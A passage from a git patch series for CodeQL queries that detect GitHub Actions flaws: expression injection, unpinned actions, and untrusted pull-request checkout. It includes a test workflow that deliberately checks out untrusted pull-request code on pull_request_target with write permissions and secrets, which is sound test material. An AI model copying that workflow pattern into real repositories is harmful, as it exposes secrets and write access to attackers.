github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml new file mode 100644 index 000000000000..cb20cfe629bf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml @@ -0,0 +1,135 @@ +name: Python CI + +on: + push: + branches: [ master ] + pull_request_target: + branches: [ master, stable ] + +concurrency: + group: ${{ format('ci-{0}', github.head_ref && format('pr-{0}', github.event.pull_request.number) || github.sha) }} + cancel-in-progress: ${{ github.event_name == 'pull_request_target' }} + +jobs: + lint: + runs-on: ubuntu-latest + env: + min-python-version: "3.10" + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Set up Python ${{ env.min-python-version }} + uses: actions/setup-python@v2 + with: + python-version: ${{ env.min-python-version }} + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements.txt + + - name: Lint with flake8 + run: flake8 + + - name: Check black formatting + run: black . --check + if: success() || failure() + + - name: Check isort formatting + run: isort . --check + if: success() || failure() + + - name: Check mypy formatting + run: mypy + if: success() || failure() + + test: + permissions: + # Gives the action the necessary permissions for publishing new + # comments in pull requests. + pull-requests: write + # Gives the action the necessary permissions for pushing data to the + # python-coverage-comment-action branch, and for editing existing + # comments (to avoid publishing multiple comments in the same PR) + contents: write + runs-on: ubuntu-latest + strategy: + matrix: + python-version: ["3.10"] + + steps: + - name: Check out repository + uses: actions/checkout@v3 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Set up Python ${{ matrix.python-version }} + uses: actions/setup-python@v2 + with: + python-version: ${{ matrix.python-version }} + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements.txt + + - name: Run unittest tests with coverage + run: | + pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term + env: + CI: true + PROXY: ${{ secrets.PROXY }} + AGENT_MODE: ${{ vars.AGENT_MODE }} + AGENT_TYPE: ${{ vars.AGENT_TYPE }} + + - name: Upload coverage reports to Codecov + uses: codecov/codecov-action@v3 + + - name: Stage new files and commit + id: stage_files + run: | + git add tests + git diff --cached --quiet && echo "No changes to commit" && exit 0 + git config user.email "github-actions@github.com" + git config user.name "GitHub Actions" + git commit -m "Add new cassettes" + TIMESTAMP_COMMIT=$(date +%Y%m%d%H%M%S) # generate a timestamp + echo "TIMESTAMP_COMMIT=TIMESTAMP_COMMIT" >> $GITHUB_ENV + + + - name: Create PR + id: create_pr + if: ${{ env.TIMESTAMP_COMMIT != null }} + uses: peter-evans/create-pull-request@v5 + with: + commit-message: Update cassettes + branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }} + title: "Update cassette-diff-PR${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }}" + body: "This PR updates the cassettes. Please merge it." + + + - name: Check PR + if: ${{ env.TIMESTAMP_COMMIT != null }} + run: | + echo "Pull Request Number - ${{ steps.create_pr.outputs.pull-request-number }}" + echo "Pull Request URL - ${{ steps.create_pr.outputs.pull-request-url }}" + + - name: Comment PR URL in the current PR + if: ${{ env.TIMESTAMP_COMMIT != null }} + uses: thollander/actions-comment-pull-request@v2 + with: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + message: | + Please click [HERE](${{ steps.create_pr.outputs.pull-request-url }}) and merge this PR to update the cassettes. + + - name: Fail if new PR created + if: ${{ env.TIMESTAMP_COMMIT != null }} + run: exit 1 diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 6620d2ac3852..67fcc5555d16 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,5 +1,8 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 7527a1e15f2c..be1c7cbfebdb 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1 +1,4 @@ -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 87b284e5e6b49b431aef3c23099ac80b0fe8753e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 19:14:57 +0100 Subject: [PATCH 093/707] update --- ql/lib/codeql/actions/Ast.qll | 8 +- .../codeql/actions/dataflow/FlowSources.qll | 89 +++++++++++-------- 2 files changed, 55 insertions(+), 42 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 271182a05dd2..3d675bebce02 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -5,9 +5,11 @@ module Utils { bindingset[expr] string normalizeExpr(string expr) { result = - expr.regexpReplaceAll("[\\.\\'\\[\\]\"]+", ".") - .regexpReplaceAll("\\.$", "") - .regexpReplaceAll("\\.\\s", " ") + expr.replaceAll("['", ".") + .replaceAll("']", "") + .replaceAll("[\"", ".") + .replaceAll("\"]", "") + .regexpReplaceAll("\\s*\\.\\s*", ".") } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 23ae225e07ed..d3a96e1a2c7a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,6 +1,7 @@ import actions import codeql.actions.DataFlow import codeql.actions.dataflow.ExternalFlow +import codeql.actions.Ast::Utils as Utils /** * A data flow source. @@ -24,8 +25,11 @@ abstract class RemoteFlowSource extends SourceNode { bindingset[context] private predicate isExternalUserControlledIssue(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*body\\b") + exists(string reg | + reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] @@ -33,35 +37,39 @@ private predicate isExternalUserControlledPullRequest(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*title\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*body\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*label\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*default_branch\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*description\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*homepage\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*ref\\b", - "\\bgithub\\s*\\.\\s*head_ref\\b" + "\\bgithub\\.event\\.pull_request\\.title\\b", "\\bgithub\\.event\\.pull_request\\.body\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.label\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.default_branch\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.description\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.homepage\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b" ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } bindingset[context] private predicate isExternalUserControlledReview(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*review\\s*\\.\\s*body\\b") + Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.review\\.body\\b") } bindingset[context] private predicate isExternalUserControlledComment(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*comment\\s*\\.\\s*body\\b") + Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.comment\\.body\\b") } bindingset[context] private predicate isExternalUserControlledGollum(string context) { - context - .regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*page_name\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*title\\b") + exists(string reg | + reg = + [ + "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.page_name\\b", + "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b" + ] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] @@ -69,26 +77,29 @@ private predicate isExternalUserControlledCommit(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.message\\b", + "\\bgithub\\.event\\.head_commit\\.message\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.email\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.head_commit\\.committer\\.email\\b", + "\\bgithub\\.event\\.head_commit\\.committer\\.name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.email\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b", ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } bindingset[context] private predicate isExternalUserControlledDiscussion(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*title\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*body\\b") + exists(string reg | + reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] @@ -96,18 +107,18 @@ private predicate isExternalUserControlledWorkflowRun(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow\\s*\\.\\s*path\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*name\\b", + "\\bgithub\\.event\\.workflow\\.path\\b", + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", + "\\bgithub\\.event\\.workflow_run\\.display_title\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.description\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.message\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.email\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.email\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b", ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } From 0e50204672f05fdd33b115ff36a2c9f5c2c10bef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 22:19:55 +0100 Subject: [PATCH 094/707] More regexp improvements --- ql/lib/codeql/actions/ast/internal/Ast.qll | 31 ++++++------ .../codeql/actions/dataflow/ExternalFlow.qll | 4 +- .../codeql/actions/dataflow/FlowSources.qll | 8 +-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 1 + .../CWE-020/CompositeActionsSources.ql | 1 + .../CWE-020/CompositeActionsSummaries.ql | 1 + .../CWE-020/ReusableWorkflowsSinks.ql | 1 + .../CWE-020/ReusableWorkflowsSources.ql | 1 + .../CWE-020/ReusableWorkflowsSummaries.ql | 1 + .../CWE-094/CriticalExpressionInjection.ql | 1 + .../Security/CWE-094/ExpressionInjection.ql | 1 + ql/src/Security/CWE-829/UntrustedCheckout.ql | 49 ++++++++++--------- 13 files changed, 59 insertions(+), 45 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 14f3cd2ecd9c..7ebed407c0fd 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,5 +1,6 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations +private import codeql.actions.Ast::Utils as Utils /** * Gets the length of each line in the StringValue . @@ -833,9 +834,9 @@ class StepsExpressionImpl extends ContextExpressionImpl { string fieldName; StepsExpressionImpl() { - expression.regexpMatch(stepsCtxRegex()) and - stepId = expression.regexpCapture(stepsCtxRegex(), 1) and - fieldName = expression.regexpCapture(stepsCtxRegex(), 2) + Utils::normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and + stepId = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -856,9 +857,9 @@ class NeedsExpressionImpl extends ContextExpressionImpl { string fieldName; NeedsExpressionImpl() { - expression.regexpMatch(needsCtxRegex()) and - fieldName = expression.regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = expression.regexpCapture(needsCtxRegex(), 1) and + Utils::normalizeExpr(expression).regexpMatch(needsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and neededJob.getLocation().getFile() = this.getLocation().getFile() } @@ -886,9 +887,9 @@ class JobsExpressionImpl extends ContextExpressionImpl { string fieldName; JobsExpressionImpl() { - expression.regexpMatch(jobsCtxRegex()) and - jobId = expression.regexpCapture(jobsCtxRegex(), 1) and - fieldName = expression.regexpCapture(jobsCtxRegex(), 2) + Utils::normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and + jobId = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -911,8 +912,8 @@ class InputsExpressionImpl extends ContextExpressionImpl { string fieldName; InputsExpressionImpl() { - expression.regexpMatch(inputsCtxRegex()) and - fieldName = expression.regexpCapture(inputsCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -936,8 +937,8 @@ class EnvExpressionImpl extends ContextExpressionImpl { string fieldName; EnvExpressionImpl() { - expression.regexpMatch(envCtxRegex()) and - fieldName = expression.regexpCapture(envCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(envCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -959,8 +960,8 @@ class MatrixExpressionImpl extends ContextExpressionImpl { string fieldName; MatrixExpressionImpl() { - expression.regexpMatch(matrixCtxRegex()) and - fieldName = expression.regexpCapture(matrixCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 008b5a19ce63..7e265fb2570d 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -1,6 +1,6 @@ private import internal.ExternalFlowExtensions as Extensions -import codeql.actions.DataFlow -import actions +private import codeql.actions.DataFlow +private import actions /** * MaD sources diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index d3a96e1a2c7a..a586cab4a322 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,7 +1,7 @@ -import actions -import codeql.actions.DataFlow -import codeql.actions.dataflow.ExternalFlow -import codeql.actions.Ast::Utils as Utils +private import actions +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.Ast::Utils as Utils /** * A data flow source. diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index fddf537ed1df..c10334436aa7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -2,10 +2,10 @@ * Provides classes representing various flow steps for taint tracking. */ -import actions +private import actions private import codeql.util.Unit private import codeql.actions.DataFlow -import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.dataflow.ExternalFlow /** * A unit class for adding additional taint steps. diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 1f90efa5bcc9..0ea0713983d3 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 0edeb0a7ec80..8e4275f27c7d 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 59a05f64b6c9..8b8b5af3c459 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index d84566dab046..31fbc1eaae2a 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 6e88f36feced..e5612d063432 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 4f710a16e8f6..444ce028954e 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 66a055634c7e..e24b1ab9ddc0 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index d59cc07cad26..1e7414e5ce6d 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 438e3dfe7fc2..c9ad93d18b20 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -18,32 +18,37 @@ import actions /** An If node that contains an actor, user or label check */ class ControlCheck extends If { ControlCheck() { - Utils::normalizeExpr(this.getCondition()) - .regexpMatch([ - ".*github\\.actor.*", ".*github\\.triggering_actor.*", - ".*github\\.event\\.pull_request\\.user\\.login.*", - ".*github\\.event\\.pull_request\\.labels.*", ".*github\\.event\\.label\\.name.*" - ]) + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", // actor + "\\bgithub\\.triggering_actor\\b", // actor + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user + "\\bgithub\\.event\\.pull_request\\.labels\\b", // label + "\\bgithub\\.event\\.label\\.name\\b" // label + ], _, _) + ) } } bindingset[s] predicate containsHeadRef(string s) { - Utils::normalizeExpr(s) - .matches("%" + - [ - "github.event.number", // The pull request number. - "github.event.pull_request.head.ref", // The ref name of head. - "github.event.pull_request.head.sha", // The commit SHA of head. - "github.event.pull_request.id", // The pull request ID. - "github.event.pull_request.number", // The pull request number. - "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. - "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. - "github.event.workflow_run.head_branch", // The branch of the head commit. - "github.event.workflow_run.head_commit.id", // The SHA of the head commit. - "github.event.workflow_run.head_sha", // The SHA of the head commit. - "env.GITHUB_HEAD_REF", - ] + "%") + exists( + Utils::normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head. + "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head. + "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID. + "\\bgithub\\.event\\.pull_request\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", // The SHA of the merge commit. + "\\bgithub\\.head_ref\\b", // The head_ref or source branch of the pull request in a workflow run. + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit. + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. + "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. + "\\benv\\.GITHUB_HEAD_REF\\b", + ], _, _) + ) } /** Checkout of a Pull Request HEAD ref */ @@ -68,7 +73,7 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { or exists(string varname | 